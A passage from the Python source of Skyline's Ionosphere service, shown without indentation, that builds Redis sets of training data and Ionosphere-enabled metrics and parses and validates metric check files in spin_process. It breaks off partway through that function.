# training_data_instances.append([metric, timestamp])
training_data_instances.append([metric, timestamp, resolution_seconds])
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to evaluate training_dir - %s' % str(training_data_dir))
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# If the IONOSPHERE_HISTORICAL_DATA_FOLDER dir exist iterate it and
# and historical training data to the list.
if os.path.exists(IONOSPHERE_HISTORICAL_DATA_FOLDER) and IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
historical_training_data_added = 0
if training_data_instances:
training_data_count = len(training_data_instances)
logger.info('There are %s training_data instances before iterating histroical training data' % (str(training_data_count)))
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
logger.info('still creating training_data Redis set')
last_log_time = current_time
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
for path, folders, files in os.walk(IONOSPHERE_HISTORICAL_DATA_FOLDER):
try:
add_folder = False
metric = None
timestamp = None
historical_metric_data = False
if files:
for historical_metric_namespace in IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
if historical_metric_data:
continue
for ifile in files:
if historical_metric_namespace in ifile:
historical_metric_data = True
break
if historical_metric_data:
add_folder = False
metric = None
timestamp = None
if '/learn/' in path:
metric_file = None
metric_file_path = None
continue
for ifile in files:
if ifile.endswith('.png'):
add_folder = True
if ifile.endswith('.txt'):
if ifile.endswith('.fp.details.txt'):
continue
if ifile.endswith('.fp.created.txt'):
continue
else:
metric_file = ifile
metric_file_path = path
if add_folder:
if metric_file and metric_file_path:
metric = metric_file.replace('.txt', '', 1)
path_elements = metric_file_path.split(os.sep)
for element in path_elements:
if re.match('\d{10}', element):
timestamp = int(element)
if metric and timestamp:
resolution_seconds = settings.FULL_DURATION
for ifile in files:
if ifile.endswith('.png') and 'mirage' in ifile and 'graphite' in ifile:
try:
ifile_resolution_elements = ifile.replace('.png', '', 1).split('.')
ifile_resolution_str = ifile_resolution_elements[-1]
ifile_resolution = int(ifile_resolution_str.replace('h', '', 1))
resolution_seconds = ifile_resolution * 3600
except:
pass
training_data_instances.append([metric, timestamp, resolution_seconds])
historical_training_data_added += 1
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to evaluate training_dir - %s' % str(training_data_dir))
logger.info('added %s historical training data instances' % (str(historical_training_data_added)))
if training_data_instances:
training_data_count = len(training_data_instances)
redis_set = 'ionosphere.training_data.new'
logger.info('creating Redis set %s with %s training_data instances' % (redis_set, str(training_data_count)))
try:
# Delete it if it exists and was not renamed for some reason
self.redis_conn.delete(redis_set)
logger.info(
'deleted Redis set - %s' % (redis_set))
except:
pass
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
# for metric, timestamp in training_data_instances:
for metric, timestamp, resolution_seconds in training_data_instances:
try:
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
# data = [metric, int(timestamp)]
data = [metric, int(timestamp), resolution_seconds]
self.redis_conn.sadd(redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to %s Redis set' % (str(data), redis_set))
try:
# Rename works to overwrite existing key fine
# and ... https://redis.io/commands/rename
# > when this happens RENAME executes an implicit DEL operation, so if the
# > deleted key contains a very big value it may cause high latency even if RENAME
# > itself is usually a constant-time operation.
# Does not apply, not as it is not MASSIVE set
self.redis_conn.rename('ionosphere.training_data.new', 'ionosphere.training_data')
logger.info('replaced Redis ionosphere.training_data via a rename of ionosphere.training_data.new')
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to rename ionosphere.training_data.new to ionosphere.training_data')
last_purge_ts = int(time())
try:
self.redis_conn.setex(last_purge_key, 1800, last_purge_ts)
logger.info('updated Redis key for %s' % last_purge_key)
except:
logger.error('error :: failed to update Redis key for %s' % last_purge_key)
backup_purge_ts_file = '%s/last_purge_ts.txt' % (settings.IONOSPHERE_DATA_FOLDER)
try:
write_data_to_file(skyline_app, backup_purge_ts_file, 'w', last_purge_ts)
logger.info('updated the backup_purge_ts_file with %s' % str(last_purge_ts))
except:
logger.error('error :: failed to update the backup_purge_ts_file - %s' % backup_purge_ts_file)
return
def remove_metric_check_file(self, metric_check_file):
if os.path.isfile(str(metric_check_file)):
try:
os.remove(str(metric_check_file))
logger.info('metric_check_file removed - %s' % str(metric_check_file))
except OSError:
pass
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
def manage_ionosphere_unique_metrics(self):
"""
- Create a Redis set of all Ionosphere enabled metrics.
- Manage the ionosphere.untrainable_metrics set, removing items when
they 'expire'
:param i: python process id
:return: returns True
"""
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
trace = traceback.format_exc()
logger.error('%s' % trace)
log_msg = 'error :: failed to get MySQL engine for manage_ionosphere_unique_metrics'
logger.error('%s' % log_msg)
return None, log_msg, trace
ionosphere_unique_metrics_count = 0
redis_ionosphere_unique_metrics = None
ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
redis_ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown setting to []')
ionosphere_unique_metrics = []
manage_ionosphere_unique_metrics = True
manage_ionosphere_unique_metrics_key = []
try:
manage_ionosphere_unique_metrics_key = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
if LOCAL_DEBUG:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics key: %s' % str(e))
if manage_ionosphere_unique_metrics_key is not None:
manage_ionosphere_unique_metrics = False
logger.info('getting MySQL engine for ionosphere_enabled_metrics')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine for ionosphere_enabled_metrics')
return False
if not engine:
logger.error('error :: MySQL engine not obtained for ionosphere_enabled_metrics')
return False
# Determine the metrics that have ionosphere_enabled
# @added 20170103 - Task #1658: Patterning Skyline Ionosphere
# TODO: We need 2 sets not just ionosphere.unique_metrics otherwise
# if a metric is switch from Analyzer to Mirage will send all
# matched anomalies to Ionosphere even if there is no features
# profile at the specified duration.
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
# @modified 20170108 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Yes those ^^ are needed, MySQL join?
ionosphere_enabled_metrics = []
ionosphere_metrics_count = 0
query_ok = False
try:
stmt = 'select metric from metrics where ionosphere_enabled=1'
connection = engine.connect()
for row in engine.execute(stmt):
metric_basename = row['metric']
metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(metric_basename))
ionosphere_enabled_metrics.append(metric_name)
connection.close()
query_ok = True
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled metrics from the DB to manage ionosphere.unique_metrics Redis set')
ionosphere_metrics_count = len(ionosphere_enabled_metrics)
logger.info('db has %s ionosphere_enabled metrics' % (str(ionosphere_metrics_count)))
# @added 20190528 - Branch #3002: docker
if ionosphere_metrics_count == 0:
ionosphere_enabled_metrics = ['none']
if manage_ionosphere_unique_metrics:
# Testing the query was fine and Ionosphere metrics can go to 0 if
# all were disabled
if query_ok:
manage_ionosphere_unique_metrics = True
else:
manage_ionosphere_unique_metrics = False
if manage_ionosphere_unique_metrics:
for metric_name in ionosphere_enabled_metrics:
try:
self.redis_conn.sadd('ionosphere.new_unique_metrics', metric_name)
# logger.info('added %s to ionosphere.new_unique_metrics Redis set' % metric_name)
except:
logger.error(traceback.format_exc())
logger.info('error :: failed to add %s to ionosphere.new_unique_metrics Redis set' % metric_name)
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
try:
logger.info('replacing Redis ionosphere.unique_metrics via rename of ionosphere.new_unique_metrics')
self.redis_conn.rename('ionosphere.new_unique_metrics', 'ionosphere.unique_metrics')
manage_ionosphere_unique_metrics = False
ionosphere_unique_metrics = []
except Exception as e:
if str(e) == 'no such key':
logger.info('could not rename Redis set ionosphere.new_unique_metrics to ionosphere.unique_metrics: %s' % str(e))
else:
logger.error('error :: could not rename Redis set ionosphere.new_unique_metrics to ionosphere.unique_metrics: %s' % str(e))
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
redis_ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
redis_ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('the new Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown setting to []')
ionosphere_unique_metrics = []
if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Manage ionosphere_untrainable_metrics Redis set
ionosphere_untrainable_metrics = []
ionosphere_untrainable_metrics_redis_set = 'ionosphere.untrainable_metrics'
try:
ionosphere_untrainable_metrics = list(self.redis_conn_decoded.smembers(ionosphere_untrainable_metrics_redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get the ionosphere.untrainable_metrics set from Redis')
if ionosphere_untrainable_metrics:
ionosphere_untrainable_metrics_check_time = int(time())
for ionosphere_untrainable_metric_str in ionosphere_untrainable_metrics:
try:
ionosphere_untrainable_metric = literal_eval(ionosphere_untrainable_metric_str)
ium_remove_after_timestamp = int(ionosphere_untrainable_metric[6])
if ionosphere_untrainable_metrics_check_time >= ium_remove_after_timestamp:
try:
self.redis_conn.srem(ionosphere_untrainable_metrics_redis_set, str(ionosphere_untrainable_metric))
logger.info('removed item - %s - from Redis set - %s' % (str(ionosphere_untrainable_metric), ionosphere_untrainable_metrics_redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove item list from Redis set - %s' % ionosphere_untrainable_metrics_redis_set)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to manage Redis set %s' % ionosphere_untrainable_metrics_redis_set)
return True
# @added 20161230 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
def new_load_metric_vars(self, metric_vars_file):
"""
Load the metric variables for a check from a metric check variables file
:param metric_vars_file: the path and filename to the metric variables files
:type metric_vars_file: str
:return: the metric_vars list or ``False``
:rtype: list
"""
if os.path.isfile(metric_vars_file):
logger.info(
'loading metric variables from metric_check_file - %s' % (
str(metric_vars_file)))
else:
logger.error(
'error :: loading metric variables from metric_check_file - file not found - %s' % (
str(metric_vars_file)))
return False
metric_vars = []
with open(metric_vars_file) as f:
for line in f:
no_new_line = line.replace('\n', '')
no_equal_line = no_new_line.replace(' = ', ',')
array = str(no_equal_line.split(',', 1))
add_line = literal_eval(array)
metric_vars.append(add_line)
string_keys = ['metric', 'anomaly_dir', 'added_by', 'app', 'source']
float_keys = ['value']
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
int_keys = [
'from_timestamp', 'metric_timestamp', 'added_at', 'full_duration',
'ionosphere_parent_id']
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
array_keys = ['triggered_algorithms', 'algorithms', 'algorithms_run']
boolean_keys = ['graphite_metric', 'run_crucible_tests']
metric_vars_array = []
for var_array in metric_vars:
key = None
value = None
if var_array[0] in string_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = str(value_str)
if var_array[0] == 'metric':
metric = value
if var_array[0] in float_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = float(value_str)
if var_array[0] in int_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = int(value_str)
if var_array[0] in array_keys:
key = var_array[0]
value = literal_eval(str(var_array[1]))
if var_array[0] in boolean_keys:
key = var_array[0]
if str(var_array[1]) == 'True':
value = True
else:
value = False
if key:
metric_vars_array.append([key, value])
if len(metric_vars_array) == 0:
logger.error(
'error :: loading metric variables - none found' % (
str(metric_vars_file)))
return False
logger.info('debug :: metric_vars for %s' % str(metric))
logger.info('debug :: %s' % str(metric_vars_array))
return metric_vars_array
# @added 20170109 - Feature #1854: Ionosphere learn
# Added the spawn_learn_process after determining to is not fit to bolt learn
# inside of ionosphere.py in its entirety, no point in more conditional nesting
# and bulking up ionosphere.py with more learn parameter to spin_process etc
# ionosphere.py works, as good as it gets, so extended with learn.py. This uses
# the same no memory leak pattern that was adopted for smtp_alerts.
def spawn_learn_process(self, i, timestamp):
"""
Spawn a process to learn.
This is used for Ionosphere to learn if anomalous metrics remain
anomalous over time, as the resolution decreases. It follows the
multiprocessing methodology the was introduced in Analyzer and Mirage
in the context of the process objects being cleared down and the learn
processes cannot create memory leaks as the process always terminates or
is terminated this prevents any memory leaks in the parent.
"""
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# learn(timestamp)
ionosphere_learn(timestamp)
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
def process_ionosphere_echo(self, i, metric_check_file):
"""
Spawn a process_ionosphere_echo check to create features profiles at
settings.FULL_DURATION for Mirage metrics
:param i: python process id
:param metric_check_file: full path to the metric check file
:type i: object
:type metric_check_file: str
:return: boolean
:rtype: boolean
"""
try:
# Load and validate metric variables
metric_vars_array = self.new_load_metric_vars(str(metric_check_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: process_ionosphere_echo :: failed to load metric variables from check file - %s' % (metric_check_file))
return
added_by = None
try:
key = 'added_by'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_by = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_by - %s' % added_by)
except:
logger.error('error :: process_ionosphere_echo failed to read added_by variable from check file - %s' % (metric_check_file))
added_by = None
if not added_by:
return
if added_by != 'mirage':
# @modified 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Allow to be added by webapp
if added_by == 'webapp':
logger.info('process_ionosphere_echo :: metric added_by %s OK' % added_by)
else:
logger.info('process_ionosphere_echo :: only mirage metrics are processed not metrics added_by %s' % added_by)
return
metric = None
try:
# metric_vars.metric
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric - %s' % metric)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
metric = None
if not metric:
logger.error('error :: process_ionosphere_echo failed to load metric variable from check file - %s' % (metric_check_file))
return
# @added 20190413 - Feature #2484: FULL_DURATION feature profiles
# Only process if it is an ionosphere enabled metric
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
ionosphere_unique_metrics = []
if ionosphere_unique_metrics:
# @modified 20190413 - Bug #2942: process_ionosphere_echo metric mismatch
# Feature #2484: FULL_DURATION feature profiles
# Matching bug for not in list comprehension it must be an absolute
# match
# if not metric in ionosphere_unique_metrics:
metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(metric))
# @modified 20190522: Task #3034: Reduce multiprocessing Manager list usage
# if not metric_name in ionosphere_unique_metrics:
if metric_name not in ionosphere_unique_metrics:
# @modified 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Allow metrics added by webapp to skip this check as they may
# be new ionosphere metrics and not be in the ionosphere.unique_metrics
# set yet
if added_by == 'webapp':
logger.info('process_ionosphere_echo :: %s is not in ionosphere.unique_metrics but added by webapp so possibly a new metric' % metric)
else:
logger.info('process_ionosphere_echo :: only ionosphere enabled metrics are processed, skipping %s' % metric)
return
full_duration = None
try:
# metric_vars.full_duration
key = 'full_duration'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
full_duration = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - full_duration - %s' % str(full_duration))
except:
logger.error('error :: process_ionosphere_echo failed to read full_duration variable from check file - %s' % (metric_check_file))
full_duration = None
if not full_duration:
return
logger.info('process_ionosphere_echo :: processing - %s' % (metric))
ionosphere_echo(metric, full_duration)
# @modified 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added the ionosphere_busy parameter
# def spin_process(self, i, metric_check_file):
def spin_process(self, i, metric_check_file, ionosphere_busy):
"""
Assign an anomalous metric to check against features profiles.
:param i: python process id
:param metric_check_file: full path to the metric check file
:param ionosphere_busy: whether to Ionosphere manage and alternate
between normal Ionosphere and echo analysis
:type i: object
:type metric_check_file: str
:type ionosphere_busy: boolen
:return: int
:rtype: int or boolean
"""
dev_null = None
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
logger.error(traceback.format_exc())
log_msg = 'error :: failed to get MySQL engine in spin_process'
logger.error('error :: failed to get MySQL engine in spin_process')
return None, log_msg, trace
def engine_disposal(engine):
if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
return
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
def remove_waterfall_alert(added_by, metric_timestamp, base_name):
redis_waterfall_alert_set = '%s.waterfall_alerts.sent_to_ionosphere' % added_by
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_waterfall_alert_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_timestamp):
try:
self.redis_conn.srem(redis_waterfall_alert_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_waterfall_alert_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_waterfall_alert_set))
# @added 20201128 - Feature #3734: waterfall alerts
# If the check just done is newer than an existing mirage
# waterfall alert metric timestamp remove those keys as well
if int(waterfall_alert[1]) < metric_timestamp:
try:
self.redis_conn.srem(redis_waterfall_alert_set, str(waterfall_alert))
logger.info('removed waterfall alert item with older timestamp from Redis set %s - %s' % (
redis_waterfall_alert_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_waterfall_alert_set))
return
# @added 20200908 - Feature #3734: waterfall alerts
# Added a common return_to_sender_to_alert function
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
def return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run):
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration, algorithms_run]
try:
self.redis_conn.setex(cache_key, 300, str(cache_key_value))
logger.info('added Redis alert key - %s - %s' % (
cache_key, str(cache_key_value)))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s, %s]' %
(cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
str(triggered_algorithms), str(full_duration), str(algorithms_run)))
return
# @added 20210429 - Feature #3994: Panorama - mirage not anomalous
# A hash is added to the ionosphere.panorama.not_anomalous_metrics for
# every metric that is found to be not anomalous. This provides
# data for /panorama?not_anomalous and /panorama?not_anomalous_metric
# method which are used for plots in the webapp and json response.
# The ionosphere.panorama.not_anomalous_metrics Redis hash is managed in
# analyzer/metrics_manager
def add_not_anomalous_to_redis_hash(base_name, timestamp, value, full_duration):
redis_hash = 'ionosphere.panorama.not_anomalous_metrics'
try:
data = {
base_name: {
'timestamp': timestamp,
'value': value,
'hours_to_resolve': int(full_duration / 3600),
}
}
self.redis_conn.hset(redis_hash, time(), str(data))
logger.info('added entry to the %s Redis hash' % redis_hash)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis hash %s - %s' % (
str(data), str(redis_hash), e))
child_process_pid = os.getpid()
logger.info('child_process_pid - %s' % str(child_process_pid))
try:
ionosphere_max_runtime = settings.IONOSPHERE_MAX_RUNTIME
except:
ionosphere_max_runtime = 120
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: processing metric check - %s' % metric_check_file)
if not os.path.isfile(str(metric_check_file)):
logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file)))
return
engine = None
anomalous_timeseries = False
dev_null = None
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
failed_check_file = '%s/%s' % (metric_failed_check_dir, check_file_name)
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: failed_check_file - %s' % failed_check_file)
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# From batch_processing metrics the learn check is being added and
# removed as the learn check for batch metrics happens immediately as
# the learn after duration can have passed. To the check file needs to
# be loaded to determine if was added by ionosphere_learn before the
# check is just removed.
removed_check_file_work_done = False
# @added 20170307 - Feature #1960: ionosphere_layers - ionosphere_check_cache_key
# This Redis cache key check was added to prevent Ionosphere from
# running riot on checks if for some reason the check_file is not
# removed which happens if some exception is not handled as found out
# again during yesterday's development of run_layer_algorithms. It was
# a good reminder of how fast Skyline can iterate.
ionosphere_check_cache_key = 'ionosphere.check.%s' % check_file_name
check_done = False
try:
check_done = self.redis_conn.get(ionosphere_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not check_done:
logger.info('check done check - no check cache key - %s' % ionosphere_check_cache_key)
else:
# @modified 20181113 - Task #2680: Remove Ionosphere check files is key exists
# This was here for initially debugging, no longer needed
# logger.error('error :: a check cache key exists - %s' % ionosphere_check_cache_key)
# logger.error('error :: failing check to prevent multiple iterations over this check')
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
logger.info('a check cache key exists - %s' % (ionosphere_check_cache_key))
# @modified 20200807 - Feature #3480: batch_processing
# logger.info('to prevent multiple iterations over this check removing %s' % (
logger.info('to prevent multiple iterations over this check it will be removed if not added by ionosphere_learn - %s' % (
str(metric_check_file)))
# self.remove_metric_check_file(str(metric_check_file))
# return
# @added 20200807 - Feature #3480: batch_processing
removed_check_file_work_done = True
try:
check_process_start = int(time())
# @modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# redis-py 3.x only accepts user data as bytes, strings or
# numbers (ints, longs and floats). All 2.X users should
# make sure that the keys and values they pass into redis-py
# are either bytes, strings or numbers. Added cache_key_value
# self.redis_conn.setex(
# ionosphere_check_cache_key, 300, [check_process_start])
self.redis_conn.setex(
ionosphere_check_cache_key, 300, check_process_start)
logger.info(
'added Redis check key - %s' % (ionosphere_check_cache_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis check key - %s' % (ionosphere_check_cache_key))
logger.error('error :: failing check to prevent multiple iterations over this check')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# Load and validate metric variables
# @modified 20161231 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
# Use def new_load_metric_vars(self, metric_vars_file):
# metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
metric_vars_array = self.new_load_metric_vars(str(metric_check_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to load metric variables from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# Test metric variables
# We use a pythonic methodology to test if the variables are defined,
# this ensures that if any of the variables are not set for some reason
# we can handle unexpected data or situations gracefully and try and
# ensure that the process does not hang.
metric = None
try:
# metric_vars.metric
# metric = str(metric_vars.metric)
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
base_name = metric
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric - %s' % metric)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
metric = None
if not metric:
logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
value = None
try:
# metric_vars.value
# value = str(metric_vars.value)
key = 'value'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
value = float(value_list[0])
anomalous_value = value
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - value - %s' % str(value))
except:
logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file))
value = None
if not value:
# @modified 20181119 - Bug #2708: Failing to load metric vars
if value == 0.0:
pass
else:
logger.error('error :: failed to load value variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
from_timestamp = None
try:
# metric_vars.from_timestamp
# from_timestamp = str(metric_vars.from_timestamp)
key = 'from_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
from_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - from_timestamp - %s' % str(from_timestamp))
except:
# @added 20160822 - Bug #1460: panorama check file fails
# Added exception handling here
logger.info(traceback.format_exc())
logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
if not from_timestamp:
logger.error('error :: failed to load from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
metric_timestamp = None
try:
# metric_vars.metric_timestamp
# metric_timestamp = str(metric_vars.metric_timestamp)
key = 'metric_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric_timestamp - %s' % str(metric_timestamp))
except:
logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file))
metric_timestamp = None
if not metric_timestamp:
logger.error('error :: failed to load metric_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# metric_vars.algorithms
# algorithms = metric_vars.algorithms
key = 'algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
